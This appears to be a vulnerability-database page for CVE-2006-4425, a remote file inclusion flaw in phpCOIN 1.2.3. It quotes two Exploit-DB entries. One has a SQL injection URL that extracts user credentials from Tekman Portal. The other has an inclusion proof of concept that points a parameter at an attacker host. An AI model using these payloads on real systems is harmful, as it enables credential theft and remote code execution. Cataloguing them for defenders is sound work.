CVE-2006-4425
published 2006-08-29CVE-2006-4425: Multiple PHP remote file inclusion vulnerabilities in phpCOIN 1.2.3 allow remote attackers to execute arbitrary PHP code via the _CCFG[_PKG_PATH_INCL]…
PriorityP433medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EXPLOIT
EPSS
4.03%
89.3th percentile
Multiple PHP remote file inclusion vulnerabilities in phpCOIN 1.2.3 allow remote attackers to execute arbitrary PHP code via the _CCFG[_PKG_PATH_INCL] parameter in coin_includes scripts including (1) api.php, (2) common.php, (3) core.php, (4) custom.php, (5) db.php, (6) redirect.php or (7) session_set.php. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coinsoft_technologies | phpcoin | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Tekman Portal 1.0 - 'tr' SQL Injection
exploitdb·2006-09-19
CVE-2006-4916 Tekman Portal 1.0 - 'tr' SQL Injection
Tekman Portal 1.0 - 'tr' SQL Injection
---
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Tekman Portal v1.0 (tr) SQL Injection Vulnerability +
+ Author : Fix TR +
+ Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Download: http://www.aspindir.com/goster/4425
+ Version : 1.0
+ Bug In : uye_profil.asp
+ Risk : High
+ Exp.
http://[Target]/[Path]/uye_profil.asp?uye_id=1+union+select+1,kadi,null,seviye,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+uyeler+Where+seviye+like+2
# milw0rm.com [2006-09-19]
Exploit-DB
PHPCOIN 1.2.3 - 'session_set.php' Remote File Inclusion
exploitdb·2006-08-24
CVE-2006-4425 PHPCOIN 1.2.3 - 'session_set.php' Remote File Inclusion
PHPCOIN 1.2.3 - 'session_set.php' Remote File Inclusion
---
phpCOIN 1.2.3 (_CCFG[_PKG_PATH_INCL]) Remote Include Vulnerability
##################################################################
Discovered by: Timq
http://www.securitydb.org
##################################################################
Email: timq[at]hackernetwork[dot]com
http://www.securitydb.org
##################################################################
Vulnerable: require_once include ($_CCFG['_PKG_PATH_INCL'].'redirect.php');
###################################################################
Exploit PoC:
http://www.site.com/[path]/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://evil_script?
http://www.site.com/[path]/includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://evil_script?
Dork:
No writeups or analysis indexed.
http://secunia.com/advisories/21624http://www.osvdb.org/28219http://www.osvdb.org/28220http://www.osvdb.org/28221http://www.osvdb.org/28222http://www.osvdb.org/28223http://www.osvdb.org/28224http://www.osvdb.org/28225http://www.vupen.com/english/advisories/2006/3385https://exchange.xforce.ibmcloud.com/vulnerabilities/28572http://secunia.com/advisories/21624http://www.osvdb.org/28219http://www.osvdb.org/28220http://www.osvdb.org/28221http://www.osvdb.org/28222http://www.osvdb.org/28223http://www.osvdb.org/28224http://www.osvdb.org/28225http://www.vupen.com/english/advisories/2006/3385https://exchange.xforce.ibmcloud.com/vulnerabilities/28572
2006-08-29
Published